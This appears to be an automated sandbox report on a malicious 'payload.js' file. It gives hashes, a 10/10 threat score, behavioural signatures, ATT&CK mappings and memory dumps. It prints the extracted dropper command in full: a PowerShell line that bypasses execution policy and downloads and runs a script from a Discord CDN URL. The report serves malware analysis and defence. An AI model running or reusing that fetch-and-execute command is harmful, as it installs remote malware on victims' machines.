2d5964d5c8e6b8cfc4e143160f8d1d29475218f9b86324864411d3c991bee8d5

Analysis

max time kernel
117s
max time network
120s
platform
windows7_x64
resource
win7-en-20211208
submitted
10-12-2021 20:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

payload.js
Size

254B
MD5

d6c1fa2786171c21d3f12b40db9973db
SHA1

f61d2307582855a0c214a21f7bfe78a8cfdcbc24
SHA256

2d5964d5c8e6b8cfc4e143160f8d1d29475218f9b86324864411d3c991bee8d5
SHA512

7cf20a00d0b63e7c3e9164bebca0d834376db1d8fd383647c14b6e5eefa229b5d6528ef41290c8656e78bc69f641b7060e9023f0401459562677922715325386

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/910897865386250264/915258994195582976/link..txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 776 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

776 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 776 powershell.exe

flow	pid	process
5	776	powershell.exe

pid	process
776	powershell.exe

description	pid	process
Token: SeDebugPrivilege	776	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

wscript.exe

description	pid	process	target process
PID 948 wrote to memory of 776	948	wscript.exe	powershell.exe
PID 948 wrote to memory of 776	948	wscript.exe	powershell.exe
PID 948 wrote to memory of 776	948	wscript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\payload.js
1⤵
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/910897865386250264/915258994195582976/link..txt'))
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/776-56-0x0000000000000000-mapping.dmp

Download
memory/776-58-0x000007FEF30A0000-0x000007FEF3BFD000-memory.dmp

Filesize
11.4MB

Download
memory/776-59-0x0000000002620000-0x0000000002622000-memory.dmp

Filesize
8KB

Download
memory/776-60-0x0000000002622000-0x0000000002624000-memory.dmp

Filesize
8KB

Download
memory/776-61-0x0000000002624000-0x0000000002627000-memory.dmp

Filesize
12KB

Download
memory/776-62-0x000000000262B000-0x000000000264A000-memory.dmp

Filesize
124KB

Download
memory/948-55-0x000007FEFBEB1000-0x000007FEFBEB3000-memory.dmp

Filesize
8KB

Download